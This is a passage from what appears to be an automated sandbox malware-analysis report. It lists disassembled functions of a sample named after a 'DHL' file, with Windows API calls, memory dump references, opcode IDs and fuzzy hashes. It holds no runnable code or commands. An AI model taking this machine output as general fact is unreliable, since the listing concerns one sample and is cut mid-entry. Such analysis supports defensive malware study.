                                                                                      • Instruction Fuzzy Hash: 3741547190851AFBDF15AF68C848BEEB7B4FF05320F204329E469A72E5C7346950CB55
                                                                                      Function 00052D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00052D4B
                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00052D53
                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00052DE1
                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00052E0C
                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00052E61
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                      • String ID: csm
                                                                                      • API String ID: 1170836740-1018135373
                                                                                      • Opcode ID: 1149645a6002ec1dd9695e1bbc38bfbb1220038b0af48d4af4e248001699f604
                                                                                      • Instruction ID: 1e9e557dd8ccd925e56feb4d297d92846c57602b8fae30ac730abbdeca22916c
                                                                                      • Opcode Fuzzy Hash: 1149645a6002ec1dd9695e1bbc38bfbb1220038b0af48d4af4e248001699f604
                                                                                      • Instruction Fuzzy Hash: 3F419634E002099BCF14DF68C845AEFBBF5BF46356F148155ED146B352DB35AA09CBA0
                                                                                      Function 000B10B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 000B304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 000B307A
                                                                                        • Part of subcall function 000B304E: _wcslen.LIBCMT ref: 000B309B
                                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 000B1112
                                                                                      • WSAGetLastError.WSOCK32 ref: 000B1121
                                                                                      • WSAGetLastError.WSOCK32 ref: 000B11C9
                                                                                      • closesocket.WSOCK32(00000000), ref: 000B11F9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                      • String ID:
                                                                                      • API String ID: 2675159561-0
                                                                                      • Opcode ID: d6ab2eda3ba5c149e6fc4915bd01e4360ce83fd9a71adcc9a03fa9309c532fd9
                                                                                      • Instruction ID: c38a939d079140a84f6df5a2b446483fd668b3fb2530a326c63eca0d53f7595f
                                                                                      • Opcode Fuzzy Hash: d6ab2eda3ba5c149e6fc4915bd01e4360ce83fd9a71adcc9a03fa9309c532fd9
                                                                                      • Instruction Fuzzy Hash: DF410331600604AFEB109F18C894FEABBE9EF45324F548559FD19AB292C774ED41CBE0
                                                                                      Function 0009CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0009DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0009CF22,?), ref: 0009DDFD
                                                                                        • Part of subcall function 0009DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0009CF22,?), ref: 0009DE16
                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 0009CF45
                                                                                      • MoveFileW.KERNEL32(?,?), ref: 0009CF7F
                                                                                      • _wcslen.LIBCMT ref: 0009D005
                                                                                      • _wcslen.LIBCMT ref: 0009D01B
                                                                                      • SHFileOperationW.SHELL32(?), ref: 0009D061
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                      • String ID: \*.*
                                                                                      • API String ID: 3164238972-1173974218
                                                                                      • Opcode ID: a4092acd6574b36e86b78ec00d555fde9eaa22f1660223ec15b4c6ca205666c7
                                                                                      • Instruction ID: 1bf9bec96affcc041397733c8b09d082c3c8390f88500718f4a5f05c53052399
                                                                                      • Opcode Fuzzy Hash: a4092acd6574b36e86b78ec00d555fde9eaa22f1660223ec15b4c6ca205666c7
                                                                                      • Instruction Fuzzy Hash: 90414871D451185FEF52EBA4D991EDEB7F9AF44380F1000E6E509EB142EA34AB48DB50
                                                                                      Function 000C3D7C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 101windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000C3E35
                                                                                      • IsMenu.USER32(?), ref: 000C3E4A
                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 000C3E92
                                                                                      • DrawMenuBar.USER32 ref: 000C3EA5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$Item$DrawInfoInsert
                                                                                      • String ID: 0$p]
                                                                                      • API String ID: 3076010158-498393191
                                                                                      • Opcode ID: 4adec491c5c1e39972e6aaee0e866f4219adbb1ff72a8fe399764c8aa0bef2af
                                                                                      • Instruction ID: fc8c26302beca0f162127ae5be3321dfb2a269f05c90d7829acf35bad92e3b8e
                                                                                      • Opcode Fuzzy Hash: 4adec491c5c1e39972e6aaee0e866f4219adbb1ff72a8fe399764c8aa0bef2af
                                                                                      • Instruction Fuzzy Hash: 62411475A11209AFEB20DF50D884EAEBBF9FF49354F04812DE905A7290D734AE45DBA0
                                                                                      Function 00097726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00097769
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0009778F
                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00097792
                                                                                      • SysAllocString.OLEAUT32(?), ref: 000977B0
                                                                                      • SysFreeString.OLEAUT32(?), ref: 000977B9
                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 000977DE
                                                                                      • SysAllocString.OLEAUT32(?), ref: 000977EC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                      • String ID:
                                                                                      • API String ID: 3761583154-0
                                                                                      • Opcode ID: 1c6e54dab2a43d8cbc81993e79c5bf3f47bd41c52533e8ee174faf06fd57bcdf
                                                                                      • Instruction ID: 9c6a1ab7598dfa00514371d9415759930cbe89a353e86a6cb9e8f5d5b9f75743
                                                                                      • Opcode Fuzzy Hash: 1c6e54dab2a43d8cbc81993e79c5bf3f47bd41c52533e8ee174faf06fd57bcdf
                                                                                      • Instruction Fuzzy Hash: 0A21C176608219AFEF10DFE9CC88CBBB3ECEB093647048025FA08DB2A1D674DC419764
                                                                                      Function 000977FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00097842
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00097868
                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 0009786B
                                                                                      • SysAllocString.OLEAUT32 ref: 0009788C
                                                                                      • SysFreeString.OLEAUT32 ref: 00097895
                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 000978AF
                                                                                      • SysAllocString.OLEAUT32(?), ref: 000978BD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                      • String ID:
                                                                                      • API String ID: 3761583154-0
                                                                                      • Opcode ID: 6221f0f941d6a29e70c2ae0799af748a79c0dda6d1a6c2ce400dc35c3e7daa7d
                                                                                      • Instruction ID: 3ec5d8334ab16ec2b8fe63b24c959483560347105ae335d51537664b38bfd459
                                                                                      • Opcode Fuzzy Hash: 6221f0f941d6a29e70c2ae0799af748a79c0dda6d1a6c2ce400dc35c3e7daa7d
                                                                                      • Instruction Fuzzy Hash: 6A219D72608204AFEF14AFA8DC88DBB77ECEB093607148125F919CB2A1DA74DC41DB74
                                                                                      Function 000A04D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 000A04F2
                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 000A052E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateHandlePipe
                                                                                      • String ID: nul
                                                                                      • API String ID: 1424370930-2873401336
                                                                                      • Opcode ID: e144bd6d780e7ef6f0fc94277ea3199f98446d3a755097ff66441de1647f0007
                                                                                      • Instruction ID: c31d0442ae92182ce482e477d017adb979fc7b9bc52a6f1e67813b4b16bdfb05
                                                                                      • Opcode Fuzzy Hash: e144bd6d780e7ef6f0fc94277ea3199f98446d3a755097ff66441de1647f0007
                                                                                      • Instruction Fuzzy Hash: C6217E71900709EBEB209FB9DC44E9A7BF4AF46764F204A19F8A1D62E0D7709950CF20
                                                                                      Function 000A05A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 000A05C6
                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 000A0601
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateHandlePipe
                                                                                      • String ID: nul
                                                                                      • API String ID: 1424370930-2873401336
                                                                                      • Opcode ID: 67cdbf6b46208c2c6ba1758bc2ac29968dd10161cc63a1d17963a569cb3fc2dc
                                                                                      • Instruction ID: 590ca99bbc5f86c3c49170d3cb99760c2994cfaef040392aa4818c8403bdca32
                                                                                      • Opcode Fuzzy Hash: 67cdbf6b46208c2c6ba1758bc2ac29968dd10161cc63a1d17963a569cb3fc2dc
                                                                                      • Instruction Fuzzy Hash: 042135755003099BEB209FA9DC44E9A77E8BF96728F200B19F9A1E72D0D7719960CB50
                                                                                      Function 000C40AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0003600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0003604C
                                                                                        • Part of subcall function 0003600E: GetStockObject.GDI32(00000011), ref: 00036060
                                                                                        • Part of subcall function 0003600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0003606A
                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 000C4112
                                                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 000C411F
                                                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 000C412A
                                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 000C4139
                                                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 000C4145
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                                      • String ID: Msctls_Progress32
                                                                                      • API String ID: 1025951953-3636473452
                                                                                      • Opcode ID: b6d360d942ae8071314a768e4125bc3af8d3de8dfdd1c03914a7a04513614adf
                                                                                      • Instruction ID: 35d41f8b36995bb076711ad51b869363f17d3618c1969f07ed116030ce73e82c
                                                                                      • Opcode Fuzzy Hash: b6d360d942ae8071314a768e4125bc3af8d3de8dfdd1c03914a7a04513614adf
                                                                                      • Instruction Fuzzy Hash: 1F1190B2140219BEFF218F64CC86EEB7F9DFF08798F008111FB58A6050C6769C619BA4
                                                                                      Function 0006D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0006D7A3: _free.LIBCMT ref: 0006D7CC
                                                                                      • _free.LIBCMT ref: 0006D82D
                                                                                        • Part of subcall function 000629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000), ref: 000629DE
                                                                                        • Part of subcall function 000629C8: GetLastError.KERNEL32(00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000,00000000), ref: 000629F0
                                                                                      • _free.LIBCMT ref: 0006D838
                                                                                      • _free.LIBCMT ref: 0006D843
                                                                                      • _free.LIBCMT ref: 0006D897
                                                                                      • _free.LIBCMT ref: 0006D8A2
                                                                                      • _free.LIBCMT ref: 0006D8AD
                                                                                      • _free.LIBCMT ref: 0006D8B8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 776569668-0
                                                                                      • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                      • Instruction ID: be38ad5e4142b1e2cb31be17c16b0663645a5ad658ad6024bdd4aee2922864f3
                                                                                      • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                      • Instruction Fuzzy Hash: 57115B71B44B04AADA21BFB0CC47FCF7BDEAF40700F440826B299A6093EA65B5058662
                                                                                      Function 0009DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0009DA74
                                                                                      • LoadStringW.USER32(00000000), ref: 0009DA7B
                                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0009DA91
                                                                                      • LoadStringW.USER32(00000000), ref: 0009DA98
                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0009DADC
                                                                                      Strings
                                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 0009DAB9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleLoadModuleString$Message
                                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                                      • API String ID: 4072794657-3128320259
                                                                                      • Opcode ID: cfc93ad96c4c04c67fc34fc56405f467f45045a1c810108701c467921fdd5dbf
                                                                                      • Instruction ID: b8d2df8cf751f8701105f5fa7ec7718fed04db13dc119f690d02fc3686e6a65b
                                                                                      • Opcode Fuzzy Hash: cfc93ad96c4c04c67fc34fc56405f467f45045a1c810108701c467921fdd5dbf
                                                                                      • Instruction Fuzzy Hash: 360162F25002087FFB10ABA4DD89EEB336CE708301F440496F74AE2041EA789E845F75
                                                                                      Function 000A096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • InterlockedExchange.KERNEL32(00EEE568,00EEE568), ref: 000A097B
                                                                                      • EnterCriticalSection.KERNEL32(00EEE548,00000000), ref: 000A098D
                                                                                      • TerminateThread.KERNEL32(00000000,000001F6), ref: 000A099B
                                                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 000A09A9
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 000A09B8
                                                                                      • InterlockedExchange.KERNEL32(00EEE568,000001F6), ref: 000A09C8
                                                                                      • LeaveCriticalSection.KERNEL32(00EEE548), ref: 000A09CF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                      • String ID:
                                                                                      • API String ID: 3495660284-0
                                                                                      • Opcode ID: 8e9f767eadc0529b8b221b366c14b672ae731f4c9862dde186ec3482a5aa255b
                                                                                      • Instruction ID: f727891f7544705724359d98f1d3c60d17aba02aa6ef717d822668f806153663
                                                                                      • Opcode Fuzzy Hash: 8e9f767eadc0529b8b221b366c14b672ae731f4c9862dde186ec3482a5aa255b
                                                                                      • Instruction Fuzzy Hash: 72F0EC32442A12BBF7515FA4EE8DFD6BB79FF06702F442025F206908A1C7799565CF90
                                                                                      Function 000B1C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 000B1DC0
                                                                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 000B1DE1
                                                                                      • WSAGetLastError.WSOCK32 ref: 000B1DF2
                                                                                      • htons.WSOCK32(?,?,?,?,?), ref: 000B1EDB
                                                                                      • inet_ntoa.WSOCK32(?), ref: 000B1E8C
                                                                                        • Part of subcall function 000939E8: _strlen.LIBCMT ref: 000939F2
                                                                                        • Part of subcall function 000B3224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,000AEC0C), ref: 000B3240
                                                                                      • _strlen.LIBCMT ref: 000B1F35
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                      • String ID:
                                                                                      • API String ID: 3203458085-0
                                                                                      • Opcode ID: 7cbbb68f22c1cc70f1462d6a848f4af3e264757e6ed23ae28ea3df32b4cc037a
                                                                                      • Instruction ID: 8b2e81d4557a6ca366ecc5c0d8fe1f31effa627416de70a70080941f5ebafcde
                                                                                      • Opcode Fuzzy Hash: 7cbbb68f22c1cc70f1462d6a848f4af3e264757e6ed23ae28ea3df32b4cc037a
                                                                                      • Instruction Fuzzy Hash: F7B1DE70204301AFD324DF24C895FAA7BE9AF84318F94895CF55A5B2A3CB71ED46CB91
                                                                                      Function 00035D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetClientRect.USER32(?,?), ref: 00035D30
                                                                                      • GetWindowRect.USER32(?,?), ref: 00035D71
                                                                                      • ScreenToClient.USER32(?,?), ref: 00035D99
                                                                                      • GetClientRect.USER32(?,?), ref: 00035ED7
                                                                                      • GetWindowRect.USER32(?,?), ref: 00035EF8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
